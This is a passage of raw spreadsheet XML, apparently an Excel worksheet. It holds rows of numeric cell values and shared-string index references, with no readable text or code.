      </c>
      <c r="T1206">
        <v>1</v>
      </c>
      <c r="U1206">
        <v>100000</v>
      </c>
      <c r="V1206">
        <v>0</v>
      </c>
      <c r="W1206">
        <v>9000</v>
      </c>
      <c r="X1206">
        <v>0</v>
      </c>
      <c r="Y1206">
        <v>0</v>
      </c>
      <c r="Z1206">
        <v>0</v>
      </c>
      <c r="AA1206">
        <v>0</v>
      </c>
      <c r="AB1206">
        <v>500</v>
      </c>
      <c r="AC1206">
        <v>6500</v>
      </c>
      <c r="AD1206">
        <v>0</v>
      </c>
      <c r="AE1206">
        <v>1000</v>
      </c>
      <c r="AF1206" t="s">
        <v>8994</v>
      </c>
      <c r="AG1206">
        <v>90244</v>
      </c>
      <c r="AH1206">
        <v>26</v>
      </c>
      <c r="AJ1206">
        <v>420</v>
      </c>
      <c r="AK1206" t="s">
        <v>936</v>
      </c>
      <c r="AL1206" t="s">
        <v>937</v>
      </c>
      <c r="AM1206" t="s">
        <v>8995</v>
      </c>
      <c r="AN1206" t="s">
        <v>55</v>
      </c>
      <c r="AO1206">
        <v>2010</v>
      </c>
      <c r="AP1206">
        <v>85298592589</v>
      </c>
      <c r="AQ1206" t="s">
        <v>8996</v>
      </c>
      <c r="AR1206" t="s">
        <v>8994</v>
      </c>
      <c r="AS1206" t="s">
        <v>71</v>
      </c>
      <c r="AT1206" t="s">
        <v>58</v>
      </c>
      <c r="AU1206">
        <v>25</v>
      </c>
      <c r="AV1206">
        <v>0</v>
      </c>
      <c r="AW1206">
        <v>0</v>
      </c>
      <c r="AX1206">
        <v>0</v>
      </c>
      <c r="AY1206">
        <v>9</v>
      </c>
      <c r="AZ1206">
        <v>8</v>
      </c>
      <c r="BA1206" t="s">
        <v>17702</v>
      </c>
      <c r="BB1206" t="s">
        <v>16162</v>
      </c>
      <c r="BC1206" t="s">
        <v>9485</v>
      </c>
      <c r="BD1206">
        <v>0</v>
      </c>
    </row>
    <row r="1207" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1207">
        <v>5568</v>
      </c>
      <c r="B1207" t="s">
        <v>8997</v>
      </c>
      <c r="C1207" t="s">
        <v>458</v>
      </c>
      <c r="D1207" t="s">
        <v>8998</v>
      </c>
      <c r="E1207" t="s">
        <v>142</v>
      </c>
      <c r="F1207" t="s">
        <v>6080</v>
      </c>
      <c r="G1207" s="1">
        <v>44351</v>
      </c>
      <c r="H1207">
        <v>10411</v>
      </c>
      <c r="I1207">
        <v>10411</v>
      </c>
      <c r="J1207">
        <v>0</v>
      </c>
      <c r="K1207">
        <v>1</v>
      </c>
      <c r="L1207">
        <v>0</v>
      </c>
      <c r="M1207">
        <v>0</v>
      </c>
      <c r="N1207">
        <v>0</v>
      </c>
      <c r="O1207">
        <v>0</v>
      </c>
      <c r="P1207">
        <v>0</v>
      </c>
      <c r="Q1207">
        <v>0</v>
      </c>
      <c r="R1207">
        <v>0</v>
      </c>
      <c r="S1207">
        <v>1</v>
      </c>
      <c r="T1207">
        <v>0</v>
      </c>
      <c r="U1207">
        <v>0</v>
      </c>
      <c r="V1207">
        <v>500000</v>
      </c>
      <c r="W1207">
        <v>0</v>
      </c>
      <c r="X1207">
        <v>0</v>
      </c>
      <c r="Y1207">
        <v>0</v>
      </c>
      <c r="Z1207">
        <v>0</v>
      </c>
      <c r="AA1207">
        <v>0</v>
      </c>
      <c r="AB1207">
        <v>0</v>
      </c>
      <c r="AC1207">
        <v>0</v>
      </c>
      <c r="AD1207">
        <v>1</v>
      </c>
      <c r="AE1207">
        <v>0</v>
      </c>
      <c r="AF1207" t="s">
        <v>8999</v>
      </c>
      <c r="AG1207">
        <v>29467</v>
      </c>
      <c r="AH1207">
        <v>5</v>
      </c>
      <c r="AJ1207">
        <v>153</v>
      </c>
      <c r="AK1207" t="s">
        <v>5325</v>
      </c>
      <c r="AL1207" t="s">
        <v>5326</v>
      </c>
      <c r="AM1207" t="s">
        <v>9000</v>
      </c>
      <c r="AN1207" t="s">
        <v>55</v>
      </c>
      <c r="AO1207">
        <v>2018</v>
      </c>
      <c r="AP1207">
        <v>81907557244</v>
      </c>
      <c r="AQ1207" t="s">
        <v>9001</v>
      </c>
      <c r="AR1207" t="s">
        <v>9002</v>
      </c>
      <c r="AS1207" t="s">
        <v>187</v>
      </c>
      <c r="AT1207" t="s">
        <v>72</v>
      </c>
      <c r="AU1207">
        <v>30</v>
      </c>
      <c r="AV1207">
        <v>0</v>
      </c>
      <c r="AW1207">
        <v>5</v>
      </c>
      <c r="AX1207">
        <v>0</v>
      </c>
      <c r="AY1207">
        <v>12</v>
      </c>
      <c r="AZ1207">
        <v>2</v>
      </c>
      <c r="BA1207" t="s">
        <v>17704</v>
      </c>
      <c r="BB1207" t="s">
        <v>16163</v>
      </c>
      <c r="BC1207" t="s">
        <v>9638</v>
      </c>
      <c r="BD1207">
        <v>0</v>
      </c>
    </row>
    <row r="1208" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1208">
        <v>5611</v>
      </c>
      <c r="B1208" t="s">
        <v>9003</v>
      </c>
      <c r="C1208" t="s">
        <v>2848</v>
      </c>
      <c r="D1208" t="s">
        <v>9004</v>
      </c>
      <c r="E1208" t="s">
        <v>142</v>
      </c>
      <c r="F1208" t="s">
        <v>143</v>
      </c>
      <c r="G1208" s="1">
        <v>44301</v>
      </c>
      <c r="H1208">
        <v>10514</v>
      </c>
      <c r="I1208">
        <v>10514</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t="s">
        <v>9005</v>
      </c>
      <c r="AG1208">
        <v>30128</v>
      </c>
      <c r="AH1208">
        <v>9</v>
      </c>
      <c r="AJ1208">
        <v>112</v>
      </c>
      <c r="AK1208" t="s">
        <v>9006</v>
      </c>
      <c r="AL1208" t="s">
        <v>9007</v>
      </c>
      <c r="AM1208" t="s">
        <v>9008</v>
      </c>
      <c r="AN1208" t="s">
        <v>68</v>
      </c>
      <c r="AO1208">
        <v>2011</v>
      </c>
      <c r="AP1208">
        <v>82177861165</v>
      </c>
      <c r="AQ1208" t="s">
        <v>9009</v>
      </c>
      <c r="AR1208" t="s">
        <v>9005</v>
      </c>
      <c r="AS1208" t="s">
        <v>71</v>
      </c>
      <c r="AT1208" t="s">
        <v>72</v>
      </c>
      <c r="AU1208">
        <v>7</v>
      </c>
      <c r="AV1208">
        <v>1</v>
      </c>
      <c r="AW1208">
        <v>0</v>
      </c>
      <c r="AX1208">
        <v>0</v>
      </c>
      <c r="AY1208">
        <v>2</v>
      </c>
      <c r="AZ1208">
        <v>10</v>
      </c>
      <c r="BA1208" t="s">
        <v>17705</v>
      </c>
      <c r="BB1208">
        <v>0</v>
      </c>
      <c r="BC1208" t="s">
        <v>13774</v>
      </c>
      <c r="BD1208" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="1209" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1209">
        <v>5582</v>
      </c>
      <c r="B1209" t="s">
        <v>9010</v>
      </c>
      <c r="C1209" t="s">
        <v>129</v>
      </c>
      <c r="D1209" t="s">
        <v>9011</v>
      </c>
      <c r="E1209" t="s">
        <v>9012</v>
      </c>
      <c r="F1209" t="s">
        <v>9013</v>
      </c>
      <c r="G1209" s="1">
        <v>44327</v>
      </c>
      <c r="H1209">
        <v>10517</v>
      </c>
      <c r="I1209">
        <v>10517</v>
      </c>
      <c r="J1209">
        <v>1</v>
      </c>
      <c r="K1209">
        <v>0</v>
      </c>
      <c r="L1209">
        <v>0</v>
      </c>
      <c r="M1209">
        <v>0</v>
      </c>
      <c r="N1209">
        <v>0</v>
      </c>
      <c r="O1209">
        <v>0</v>
      </c>
      <c r="P1209">
        <v>0</v>
      </c>
      <c r="Q1209">
        <v>0</v>
      </c>
      <c r="R1209">
        <v>0</v>
      </c>
      <c r="S1209">
        <v>1</v>
      </c>
      <c r="T1209">
        <v>0</v>
      </c>
      <c r="U1209">
        <v>500</v>
      </c>
      <c r="V1209">
        <v>0</v>
      </c>
      <c r="W1209">
        <v>0</v>
      </c>
      <c r="X1209">
        <v>0</v>
      </c>
      <c r="Y1209">
        <v>0</v>
      </c>
      <c r="Z1209">
        <v>0</v>
      </c>
      <c r="AA1209">
        <v>0</v>
      </c>
      <c r="AB1209">
        <v>0</v>
      </c>
      <c r="AC1209">
        <v>0</v>
      </c>
      <c r="AD1209">
        <v>1</v>
      </c>
      <c r="AE1209">
        <v>0</v>
      </c>
      <c r="AF1209" t="s">
        <v>9014</v>
      </c>
      <c r="AG1209">
        <v>15212</v>
      </c>
      <c r="AH1209">
        <v>11</v>
      </c>
      <c r="AJ1209">
        <v>268</v>
      </c>
      <c r="AK1209" t="s">
        <v>252</v>
      </c>
      <c r="AL1209" t="s">
        <v>9015</v>
      </c>
      <c r="AM1209" t="s">
        <v>9016</v>
      </c>
      <c r="AN1209" t="s">
        <v>55</v>
      </c>
      <c r="AO1209">
        <v>2020</v>
      </c>
      <c r="AP1209" t="s">
        <v>9017</v>
      </c>
      <c r="AQ1209" t="s">
        <v>9017</v>
      </c>
      <c r="AR1209" t="s">
        <v>9014</v>
      </c>
      <c r="AS1209" t="s">
        <v>187</v>
      </c>
      <c r="AT1209" t="s">
        <v>58</v>
      </c>
      <c r="AU1209">
        <v>0</v>
      </c>
      <c r="AV1209">
        <v>0</v>
      </c>
      <c r="AW1209">
        <v>0</v>
      </c>
      <c r="AX1209">
        <v>0</v>
      </c>
      <c r="AY1209">
        <v>7</v>
      </c>
      <c r="AZ1209">
        <v>2</v>
      </c>
      <c r="BA1209" t="s">
        <v>17627</v>
      </c>
      <c r="BB1209">
        <v>0</v>
      </c>
      <c r="BC1209" t="s">
        <v>13739</v>
      </c>
      <c r="BD1209">
        <v>0</v>
      </c>
    </row>
    <row r="1210" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1210">
        <v>5604</v>
      </c>
      <c r="B1210" t="s">
        <v>7012</v>
      </c>
      <c r="C1210" t="s">
        <v>318</v>
      </c>
      <c r="D1210" t="s">
        <v>9018</v>
      </c>
      <c r="E1210" t="s">
        <v>142</v>
      </c>
      <c r="F1210" t="s">
        <v>9019</v>
      </c>
      <c r="G1210" s="1">
        <v>44322</v>
      </c>
      <c r="H1210">
        <v>10575</v>
      </c>
      <c r="I1210">
        <v>10575</v>
      </c>
      <c r="J1210">
        <v>2</v>
      </c>
      <c r="K1210">
        <v>3</v>
      </c>
      <c r="L1210">
        <v>7</v>
      </c>
      <c r="M1210">
        <v>3</v>
      </c>
      <c r="N1210">
        <v>0</v>
      </c>
      <c r="O1210">
        <v>0</v>
      </c>
      <c r="P1210">
        <v>0</v>
      </c>
      <c r="Q1210">
        <v>53</v>
      </c>
      <c r="R1210">
        <v>49</v>
      </c>
      <c r="S1210">
        <v>0</v>
      </c>
      <c r="T1210">
        <v>0</v>
      </c>
      <c r="U1210">
        <v>33000</v>
      </c>
      <c r="V1210">
        <v>6500</v>
      </c>
      <c r="W1210">
        <v>14800</v>
      </c>
      <c r="X1210">
        <v>4500</v>
      </c>
      <c r="Y1210">
        <v>0</v>
      </c>
      <c r="Z1210">
        <v>0</v>
      </c>
      <c r="AA1210">
        <v>0</v>
      </c>
      <c r="AB1210">
        <v>8070</v>
      </c>
      <c r="AC1210">
        <v>37800</v>
      </c>
      <c r="AD1210">
        <v>0</v>
      </c>
      <c r="AE1210">
        <v>0</v>
      </c>
      <c r="AF1210" t="s">
        <v>5216</v>
      </c>
      <c r="AG1210">
        <v>90241</v>
      </c>
      <c r="AH1210">
        <v>26</v>
      </c>
      <c r="AJ1210">
        <v>420</v>
      </c>
      <c r="AK1210" t="s">
        <v>331</v>
      </c>
      <c r="AL1210" t="s">
        <v>332</v>
      </c>
      <c r="AM1210" t="s">
        <v>9020</v>
      </c>
      <c r="AN1210" t="s">
        <v>55</v>
      </c>
      <c r="AO1210">
        <v>2014</v>
      </c>
      <c r="AP1210" t="s">
        <v>9021</v>
      </c>
      <c r="AQ1210">
        <v>81343140368</v>
      </c>
      <c r="AR1210" t="s">
        <v>7068</v>
      </c>
      <c r="AS1210" t="s">
        <v>71</v>
      </c>
      <c r="AT1210" t="s">
        <v>58</v>
      </c>
      <c r="AU1210">
        <v>6</v>
      </c>
      <c r="AV1210">
        <v>1</v>
      </c>
      <c r="AW1210">
        <v>56</v>
      </c>
      <c r="AX1210">
        <v>67</v>
      </c>
      <c r="AY1210">
        <v>7</v>
      </c>
      <c r="AZ1210">
        <v>10</v>
      </c>
      <c r="BA1210" t="s">
        <v>16653</v>
      </c>
      <c r="BB1210">
        <v>0</v>
      </c>
      <c r="BC1210" t="s">
        <v>9536</v>
      </c>
      <c r="BD1210">
        <v>0</v>
      </c>
    </row>
    <row r="1211" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1211">
        <v>5541</v>
      </c>
      <c r="B1211" t="s">
        <v>9022</v>
      </c>
      <c r="C1211" t="s">
        <v>189</v>
      </c>
      <c r="D1211" t="s">
        <v>9023</v>
      </c>
      <c r="E1211" t="s">
        <v>142</v>
      </c>
      <c r="F1211" t="s">
        <v>9024</v>
      </c>
      <c r="G1211" s="1">
        <v>44322</v>
      </c>
      <c r="H1211">
        <v>10594</v>
      </c>
      <c r="I1211">
        <v>10594</v>
      </c>
      <c r="J1211">
        <v>2</v>
      </c>
      <c r="K1211">
        <v>0</v>
      </c>
      <c r="L1211">
        <v>2</v>
      </c>
      <c r="M1211">
        <v>2</v>
      </c>
      <c r="N1211">
        <v>0</v>
      </c>
      <c r="O1211">
        <v>0</v>
      </c>
      <c r="P1211">
        <v>0</v>
      </c>
      <c r="Q1211">
        <v>2</v>
      </c>
      <c r="R1211">
        <v>5</v>
      </c>
      <c r="S1211">
        <v>0</v>
      </c>
      <c r="T1211">
        <v>1</v>
      </c>
      <c r="U1211">
        <v>500000</v>
      </c>
      <c r="V1211">
        <v>0</v>
      </c>
      <c r="W1211">
        <v>800</v>
      </c>
      <c r="X1211">
        <v>2000</v>
      </c>
      <c r="Y1211">
        <v>0</v>
      </c>
      <c r="Z1211">
        <v>0</v>
      </c>
      <c r="AA1211">
        <v>0</v>
      </c>
      <c r="AB1211">
        <v>50</v>
      </c>
      <c r="AC1211">
        <v>250</v>
      </c>
      <c r="AD1211">
        <v>0</v>
      </c>
      <c r="AE1211">
        <v>500</v>
      </c>
      <c r="AF1211" t="s">
        <v>9025</v>
      </c>
      <c r="AG1211">
        <v>97662</v>
      </c>
      <c r="AH1211">
        <v>31</v>
      </c>
      <c r="AJ1211">
        <v>456</v>
      </c>
      <c r="AK1211" t="s">
        <v>1155</v>
      </c>
      <c r="AL1211" t="s">
        <v>9026</v>
      </c>
      <c r="AM1211" t="s">
        <v>9027</v>
      </c>
      <c r="AN1211" t="s">
        <v>55</v>
      </c>
      <c r="AO1211">
        <v>2020</v>
      </c>
      <c r="AP1211">
        <v>81313132323</v>
      </c>
      <c r="AQ1211" t="s">
        <v>9028</v>
      </c>
      <c r="AR1211" t="s">
        <v>9025</v>
      </c>
      <c r="AS1211" t="s">
        <v>71</v>
      </c>
      <c r="AT1211" t="s">
        <v>58</v>
      </c>
      <c r="AU1211">
        <v>6</v>
      </c>
      <c r="AV1211">
        <v>1</v>
      </c>
      <c r="AW1211">
        <v>8</v>
      </c>
      <c r="AX1211">
        <v>2</v>
      </c>
      <c r="AY1211">
        <v>5</v>
      </c>
      <c r="AZ1211">
        <v>2</v>
      </c>
      <c r="BA1211" t="s">
        <v>17699</v>
      </c>
      <c r="BB1211" t="s">
        <v>16157</v>
      </c>
      <c r="BC1211" t="s">
        <v>10642</v>
      </c>
      <c r="BD1211" t="s">
        <v>13763</v>
      </c>
    </row>
    <row r="1212" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1212">
        <v>5594</v>
      </c>
      <c r="B1212" t="s">
        <v>9029</v>
      </c>
      <c r="C1212" t="s">
        <v>607</v>
      </c>
      <c r="D1212" t="s">
        <v>9030</v>
      </c>
      <c r="E1212" t="s">
        <v>363</v>
      </c>
      <c r="F1212" t="s">
        <v>364</v>
      </c>
      <c r="G1212" s="1">
        <v>44379</v>
      </c>
      <c r="H1212">
        <v>10599</v>
      </c>
      <c r="I1212">
        <v>10599</v>
      </c>
      <c r="J1212">
        <v>0</v>
      </c>
      <c r="K1212">
        <v>0</v>
      </c>
      <c r="L1212">
        <v>0</v>
      </c>
      <c r="M1212">
        <v>0</v>
      </c>
      <c r="N1212">
        <v>0</v>
      </c>
      <c r="O1212">
        <v>0</v>
      </c>
      <c r="P1212">
        <v>0</v>
      </c>
      <c r="Q1212">
        <v>0</v>
      </c>
      <c r="R1212">
        <v>0</v>
      </c>
      <c r="S1212">
        <v>0</v>
      </c>
      <c r="T1212">
        <v>1</v>
      </c>
      <c r="U1212">
        <v>0</v>
      </c>
      <c r="V1212">
        <v>0</v>
      </c>
      <c r="W1212">
        <v>0</v>
      </c>
      <c r="X1212">
        <v>0</v>
      </c>
      <c r="Y1212">
        <v>0</v>
      </c>
      <c r="Z1212">
        <v>0</v>
      </c>
      <c r="AA1212">
        <v>0</v>
      </c>
      <c r="AB1212">
        <v>0</v>
      </c>
      <c r="AC1212">
        <v>0</v>
      </c>
      <c r="AD1212">
        <v>0</v>
      </c>
      <c r="AE1212">
        <v>100000</v>
      </c>
      <c r="AF1212" t="s">
        <v>9031</v>
      </c>
      <c r="AG1212">
        <v>77482</v>
      </c>
      <c r="AH1212">
        <v>24</v>
      </c>
      <c r="AJ1212">
        <v>369</v>
      </c>
      <c r="AK1212" t="s">
        <v>9032</v>
      </c>
      <c r="AL1212" t="s">
        <v>9033</v>
      </c>
      <c r="AM1212" t="s">
        <v>9034</v>
      </c>
      <c r="AN1212" t="s">
        <v>55</v>
      </c>
      <c r="AO1212">
        <v>2019</v>
      </c>
      <c r="AP1212">
        <v>87804050937</v>
      </c>
      <c r="AQ1212" t="s">
        <v>9035</v>
      </c>
      <c r="AR1212" t="s">
        <v>9031</v>
      </c>
      <c r="AS1212" t="s">
        <v>371</v>
      </c>
      <c r="AT1212" t="s">
        <v>58</v>
      </c>
      <c r="AU1212">
        <v>26</v>
      </c>
      <c r="AV1212">
        <v>0</v>
      </c>
      <c r="AW1212">
        <v>6</v>
      </c>
      <c r="AX1212">
        <v>0</v>
      </c>
      <c r="AY1212">
        <v>5</v>
      </c>
      <c r="AZ1212">
        <v>0</v>
      </c>
      <c r="BA1212" t="s">
        <v>16980</v>
      </c>
      <c r="BB1212">
        <v>0</v>
      </c>
      <c r="BC1212" t="s">
        <v>10386</v>
      </c>
      <c r="BD1212" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="1213" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1213">
        <v>5626</v>
      </c>
      <c r="B1213" t="s">
        <v>9036</v>
      </c>
      <c r="C1213" t="s">
        <v>168</v>
      </c>
      <c r="D1213" t="s">
        <v>9037</v>
      </c>
      <c r="E1213" t="s">
        <v>4116</v>
      </c>
      <c r="F1213" t="s">
        <v>9038</v>
      </c>
      <c r="G1213" s="1">
        <v>44358</v>
      </c>
      <c r="H1213">
        <v>10716</v>
      </c>
      <c r="I1213">
        <v>10716</v>
      </c>
      <c r="J1213">
        <v>0</v>
      </c>
      <c r="K1213">
        <v>0</v>
      </c>
      <c r="L1213">
        <v>0</v>
      </c>
      <c r="M1213">
        <v>0</v>
      </c>
      <c r="N1213">
        <v>0</v>
      </c>
      <c r="O1213">
        <v>0</v>
      </c>
      <c r="P1213">
        <v>0</v>
      </c>
      <c r="Q1213">
        <v>0</v>
      </c>
      <c r="R1213">
        <v>0</v>
      </c>
      <c r="S1213">
        <v>0</v>
      </c>
      <c r="T1213">
        <v>1</v>
      </c>
      <c r="U1213">
        <v>0</v>
      </c>
      <c r="V1213">
        <v>0</v>
      </c>
      <c r="W1213">
        <v>0</v>
      </c>
      <c r="X1213">
        <v>0</v>
      </c>
      <c r="Y1213">
        <v>0</v>
      </c>
      <c r="Z1213">
        <v>0</v>
      </c>
      <c r="AA1213">
        <v>0</v>
      </c>
      <c r="AB1213">
        <v>0</v>
      </c>
      <c r="AC1213">
        <v>0</v>
      </c>
      <c r="AD1213">
        <v>0</v>
      </c>
      <c r="AE1213">
        <v>2000000</v>
      </c>
      <c r="AF1213" t="s">
        <v>9039</v>
      </c>
      <c r="AG1213">
        <v>16810</v>
      </c>
      <c r="AH1213">
        <v>13</v>
      </c>
      <c r="AJ1213">
        <v>161</v>
      </c>
      <c r="AK1213" t="s">
        <v>1479</v>
      </c>
      <c r="AL1213" t="s">
        <v>9040</v>
      </c>
      <c r="AM1213" t="s">
        <v>9041</v>
      </c>
      <c r="AN1213" t="s">
        <v>55</v>
      </c>
      <c r="AO1213">
        <v>2006</v>
      </c>
      <c r="AP1213" t="s">
        <v>9042</v>
      </c>
      <c r="AQ1213" t="s">
        <v>9043</v>
      </c>
      <c r="AR1213" t="s">
        <v>9039</v>
      </c>
      <c r="AS1213" t="s">
        <v>71</v>
      </c>
      <c r="AT1213" t="s">
        <v>58</v>
      </c>
      <c r="AU1213">
        <v>24</v>
      </c>
      <c r="AV1213">
        <v>3</v>
      </c>
      <c r="AW1213">
        <v>45</v>
      </c>
      <c r="AX1213">
        <v>15</v>
      </c>
      <c r="AY1213">
        <v>6</v>
      </c>
      <c r="AZ1213">
        <v>4</v>
      </c>
      <c r="BA1213" t="s">
        <v>16655</v>
      </c>
      <c r="BB1213" t="s">
        <v>17716</v>
      </c>
      <c r="BC1213" t="s">
        <v>10031</v>
      </c>
      <c r="BD1213" t="s">
        <v>13831</v>
      </c>
    </row>
    <row r="1214" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1214">
        <v>5622</v>
      </c>
      <c r="B1214" t="s">
        <v>9044</v>
      </c>
      <c r="C1214" t="s">
        <v>872</v>
      </c>
      <c r="D1214" t="s">
        <v>9045</v>
      </c>
      <c r="E1214" t="s">
        <v>363</v>
      </c>
      <c r="F1214" t="s">
        <v>364</v>
      </c>
      <c r="G1214" s="1">
        <v>44379</v>
      </c>
      <c r="H1214">
        <v>10782</v>
      </c>
      <c r="I1214">
        <v>10782</v>
      </c>
      <c r="J1214">
        <v>0</v>
      </c>
      <c r="K1214">
        <v>0</v>
      </c>
      <c r="L1214">
        <v>0</v>
      </c>
      <c r="M1214">
        <v>0</v>
      </c>
      <c r="N1214">
        <v>0</v>
      </c>
      <c r="O1214">
        <v>0</v>
      </c>
      <c r="P1214">
        <v>0</v>
      </c>
      <c r="Q1214">
        <v>0</v>
      </c>
      <c r="R1214">
        <v>0</v>
      </c>
      <c r="S1214">
        <v>0</v>
      </c>
      <c r="T1214">
        <v>1</v>
      </c>
      <c r="U1214">
        <v>0</v>
      </c>
      <c r="V1214">
        <v>0</v>
      </c>
      <c r="W1214">
        <v>0</v>
      </c>
      <c r="X1214">
        <v>0</v>
      </c>
      <c r="Y1214">
        <v>0</v>
      </c>
      <c r="Z1214">
        <v>0</v>
      </c>
      <c r="AA1214">
        <v>0</v>
      </c>
      <c r="AB1214">
        <v>0</v>
      </c>
      <c r="AC1214">
        <v>0</v>
      </c>
      <c r="AD1214">
        <v>0</v>
      </c>
      <c r="AE1214">
        <v>0</v>
      </c>
      <c r="AF1214" t="s">
        <v>9046</v>
      </c>
      <c r="AG1214">
        <v>94562</v>
      </c>
      <c r="AH1214">
        <v>28</v>
      </c>
      <c r="AJ1214">
        <v>391</v>
      </c>
      <c r="AK1214" t="s">
        <v>9047</v>
      </c>
      <c r="AL1214" t="s">
        <v>9048</v>
      </c>
      <c r="AM1214" t="s">
        <v>9049</v>
      </c>
      <c r="AN1214" t="s">
        <v>55</v>
      </c>
      <c r="AO1214">
        <v>2021</v>
      </c>
      <c r="AP1214" t="s">
        <v>9050</v>
      </c>
      <c r="AQ1214" t="s">
        <v>9051</v>
      </c>
      <c r="AR1214" t="s">
        <v>9046</v>
      </c>
      <c r="AS1214" t="s">
        <v>371</v>
      </c>
      <c r="AT1214" t="s">
        <v>58</v>
      </c>
      <c r="AU1214">
        <v>2</v>
      </c>
      <c r="AV1214">
        <v>0</v>
      </c>
      <c r="AW1214">
        <v>0</v>
      </c>
      <c r="AX1214">
        <v>1</v>
      </c>
      <c r="AY1214">
        <v>1</v>
      </c>
      <c r="AZ1214">
        <v>0</v>
      </c>
      <c r="BA1214" t="s">
        <v>17710</v>
      </c>
      <c r="BB1214" t="s">
        <v>16167</v>
      </c>
      <c r="BC1214" t="s">
        <v>9536</v>
      </c>
      <c r="BD1214" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1215" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1215">
        <v>5522</v>
      </c>
      <c r="B1215" t="s">
        <v>9052</v>
      </c>
      <c r="C1215" t="s">
        <v>579</v>
      </c>
      <c r="D1215" t="s">
        <v>9053</v>
      </c>
      <c r="E1215" t="s">
        <v>843</v>
      </c>
      <c r="F1215" t="s">
        <v>9054</v>
      </c>
      <c r="G1215" s="1">
        <v>44356</v>
      </c>
      <c r="H1215">
        <v>10798</v>
      </c>
      <c r="I1215">
        <v>10798</v>
      </c>
      <c r="J1215">
        <v>0</v>
      </c>
      <c r="K1215">
        <v>1</v>
      </c>
      <c r="L1215">
        <v>0</v>
      </c>
      <c r="M1215">
        <v>0</v>
      </c>
      <c r="N1215">
        <v>0</v>
      </c>
      <c r="O1215">
        <v>0</v>
      </c>
      <c r="P1215">
        <v>0</v>
      </c>
      <c r="Q1215">
        <v>2</v>
      </c>
      <c r="R1215">
        <v>50</v>
      </c>
      <c r="S1215">
        <v>1</v>
      </c>
      <c r="T1215">
        <v>1</v>
      </c>
      <c r="U1215">
        <v>0</v>
      </c>
      <c r="V1215">
        <v>1</v>
      </c>
      <c r="W1215">
        <v>0</v>
      </c>
      <c r="X1215">
        <v>0</v>
      </c>
      <c r="Y1215">
        <v>0</v>
      </c>
      <c r="Z1215">
        <v>0</v>
      </c>
      <c r="AA1215">
        <v>0</v>
      </c>
      <c r="AB1215">
        <v>100</v>
      </c>
      <c r="AC1215">
        <v>100</v>
      </c>
      <c r="AD1215">
        <v>1</v>
      </c>
      <c r="AE1215">
        <v>10000</v>
      </c>
      <c r="AF1215" t="s">
        <v>4242</v>
      </c>
      <c r="AG1215">
        <v>77381</v>
      </c>
      <c r="AH1215">
        <v>23</v>
      </c>
      <c r="AJ1215">
        <v>360</v>
      </c>
      <c r="AK1215" t="s">
        <v>9055</v>
      </c>
      <c r="AL1215" t="s">
        <v>9056</v>
      </c>
      <c r="AM1215" t="s">
        <v>9057</v>
      </c>
      <c r="AN1215" t="s">
        <v>55</v>
      </c>
      <c r="AO1215">
        <v>2014</v>
      </c>
      <c r="AP1215">
        <v>82157625535</v>
      </c>
      <c r="AQ1215">
        <v>82157625535</v>
      </c>
      <c r="AR1215" t="s">
        <v>4242</v>
      </c>
      <c r="AS1215" t="s">
        <v>71</v>
      </c>
      <c r="AT1215" t="s">
        <v>58</v>
      </c>
      <c r="AU1215">
        <v>30</v>
      </c>
      <c r="AV1215">
        <v>1</v>
      </c>
      <c r="AW1215">
        <v>0</v>
      </c>
      <c r="AX1215">
        <v>0</v>
      </c>
      <c r="AY1215">
        <v>11</v>
      </c>
      <c r="AZ1215">
        <v>3</v>
      </c>
      <c r="BA1215" t="s">
        <v>17697</v>
      </c>
      <c r="BB1215" t="s">
        <v>16156</v>
      </c>
      <c r="BC1215" t="s">
        <v>13835</v>
      </c>
      <c r="BD1215" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1216" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1216">
        <v>5639</v>
      </c>
      <c r="B1216" t="s">
        <v>9058</v>
      </c>
      <c r="C1216" t="s">
        <v>477</v>
      </c>
      <c r="D1216" t="s">
        <v>9059</v>
      </c>
      <c r="E1216" t="s">
        <v>49</v>
      </c>
      <c r="F1216" t="s">
        <v>4536</v>
      </c>
      <c r="G1216" s="1">
        <v>44354</v>
      </c>
      <c r="H1216">
        <v>10835</v>
      </c>
      <c r="I1216">
        <v>10835</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t="s">
        <v>9060</v>
      </c>
      <c r="AG1216">
        <v>95378</v>
      </c>
      <c r="AH1216">
        <v>29</v>
      </c>
      <c r="AJ1216">
        <v>376</v>
      </c>
      <c r="AK1216" t="s">
        <v>715</v>
      </c>
      <c r="AL1216" t="s">
        <v>9061</v>
      </c>
      <c r="AM1216" t="s">
        <v>9062</v>
      </c>
      <c r="AN1216" t="s">
        <v>68</v>
      </c>
      <c r="AO1216">
        <v>2015</v>
      </c>
      <c r="AP1216">
        <v>81242143675</v>
      </c>
      <c r="AQ1216" t="s">
        <v>9063</v>
      </c>
      <c r="AR1216" t="s">
        <v>9060</v>
      </c>
      <c r="AS1216" t="s">
        <v>71</v>
      </c>
      <c r="AT1216" t="s">
        <v>72</v>
      </c>
      <c r="AU1216">
        <v>12</v>
      </c>
      <c r="AV1216">
        <v>0</v>
      </c>
      <c r="AW1216">
        <v>0</v>
      </c>
      <c r="AX1216">
        <v>0</v>
      </c>
      <c r="AY1216">
        <v>0</v>
      </c>
      <c r="AZ1216">
        <v>2</v>
      </c>
      <c r="BA1216" t="s">
        <v>17719</v>
      </c>
      <c r="BB1216">
        <v>0</v>
      </c>
      <c r="BC1216" t="s">
        <v>13852</v>
      </c>
      <c r="BD1216">
        <v>0</v>
      </c>
    </row>
    <row r="1217" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1217">
        <v>5617</v>
      </c>
      <c r="B1217" t="s">
        <v>9064</v>
      </c>
      <c r="C1217" t="s">
        <v>4653</v>
      </c>
      <c r="D1217" t="s">
        <v>9065</v>
      </c>
      <c r="E1217" t="s">
        <v>363</v>
      </c>
      <c r="F1217" t="s">
        <v>9066</v>
      </c>
      <c r="G1217" s="1">
        <v>44327</v>
      </c>
      <c r="H1217">
        <v>10853</v>
      </c>
      <c r="I1217">
